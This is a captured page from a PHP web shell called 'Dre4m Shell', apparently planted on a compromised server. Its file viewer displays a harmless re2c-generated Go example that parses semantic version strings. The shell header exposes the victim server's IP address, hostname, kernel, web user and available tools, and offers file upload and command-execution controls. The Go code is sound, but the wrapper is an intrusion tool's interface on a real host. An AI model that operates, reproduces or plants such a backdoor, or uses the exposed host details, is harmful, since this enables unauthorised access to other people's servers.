Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 18.191.26.149
Web Server : Apache/2.4.62 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /proc/3/root/proc/self/root/usr/share/doc/re2c/examples/go/submatch/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /proc/3/root/proc/self/root/usr/share/doc/re2c/examples/go/submatch/03_posix.go
// Code generated by re2c, DO NOT EDIT.
//line "go/submatch/03_posix.re":1
//go:generate re2go $INPUT -o $OUTPUT
package main

import "reflect"

// Maximum number of capturing groups among all rules.
//line "go/submatch/03_posix.go":10
var YYMAXNMATCH int = 4
//line "go/submatch/03_posix.re":7


type SemVer struct { major, minor, patch int }

func s2n(s string) int { // convert pre-parsed string to a number
	n := 0
	for _, c := range s { n = n*10 + int(c-'0') }
	return n
}

func parse(str string) *SemVer {
	var cur, mar int

	// Allocate memory for capturing parentheses (twice the number of groups).
	yypmatch := make([]int, YYMAXNMATCH*2)
	var yynmatch int

	// Autogenerated tag variables used by the lexer to track tag values.
	
//line "go/submatch/03_posix.go":32
	var yyt1 int
	var yyt2 int
	var yyt3 int
	var yyt4 int
	var yyt5 int
//line "go/submatch/03_posix.re":25


	
//line "go/submatch/03_posix.go":42
{
	var yych byte
	yych = str[cur]
	switch (yych) {
	case '0','1','2','3','4','5','6','7','8','9':
		yyt1 = cur
		goto yy3
	default:
		goto yy1
	}
yy1:
	cur += 1
yy2:
//line "go/submatch/03_posix.re":54
	{ return nil }
//line "go/submatch/03_posix.go":58
yy3:
	cur += 1
	mar = cur
	yych = str[cur]
	switch (yych) {
	case '.':
		goto yy4
	case '0','1','2','3','4','5','6','7','8','9':
		goto yy6
	default:
		goto yy2
	}
yy4:
	cur += 1
	yych = str[cur]
	switch (yych) {
	case '0','1','2','3','4','5','6','7','8','9':
		yyt2 = cur
		goto yy7
	default:
		goto yy5
	}
yy5:
	cur = mar
	goto yy2
yy6:
	cur += 1
	yych = str[cur]
	switch (yych) {
	case '.':
		goto yy4
	case '0','1','2','3','4','5','6','7','8','9':
		goto yy6
	default:
		goto yy5
	}
yy7:
	cur += 1
	yych = str[cur]
	switch (yych) {
	case 0x00:
		yyt3 = cur
		yyt4 = -1
		yyt5 = -1
		goto yy8
	case '.':
		yyt3 = cur
		yyt5 = cur
		goto yy9
	case '0','1','2','3','4','5','6','7','8','9':
		goto yy7
	default:
		goto yy5
	}
yy8:
	cur += 1
	yynmatch = 4
	yypmatch[2] = yyt1
	yypmatch[4] = yyt2
	yypmatch[5] = yyt3
	yypmatch[6] = yyt5
	yypmatch[7] = yyt4
	yypmatch[0] = yyt1
	yypmatch[1] = cur
	yypmatch[3] = yyt2
	yypmatch[3] += -1
//line "go/submatch/03_posix.re":41
	{
			// `yynmatch` is the number of capturing groups
			if yynmatch != 4 { panic("expected 4 submatch groups") }

			// Even `yypmatch` values are for opening parentheses, odd values
			// are for closing parentheses, the first group is the whole match.
			major := s2n(str[yypmatch[2]:yypmatch[3]])
			minor := s2n(str[yypmatch[4]:yypmatch[5]])
			patch := 0
			if yypmatch[6] != -1 { patch = s2n(str[yypmatch[6]+1:yypmatch[7]]) }

			return &SemVer{major, minor, patch}
		}
//line "go/submatch/03_posix.go":139
yy9:
	cur += 1
	yych = str[cur]
	if (yych <= 0x00) {
		goto yy5
	}
	goto yy11
yy10:
	cur += 1
	yych = str[cur]
yy11:
	switch (yych) {
	case 0x00:
		yyt4 = cur
		goto yy8
	case '0','1','2','3','4','5','6','7','8','9':
		goto yy10
	default:
		goto yy5
	}
}
//line "go/submatch/03_posix.re":55

}

func main() {
	assert_eq := func(x, y *SemVer) {
		if !reflect.DeepEqual(x, y) { panic("error") }
	}
	assert_eq(parse("23.34\000"), &SemVer{23, 34, 0})
	assert_eq(parse("1.2.9999\000"), &SemVer{1, 2, 9999})
	assert_eq(parse("1.a\000"), nil)
}

Anon7 - 2022
AnonSec Team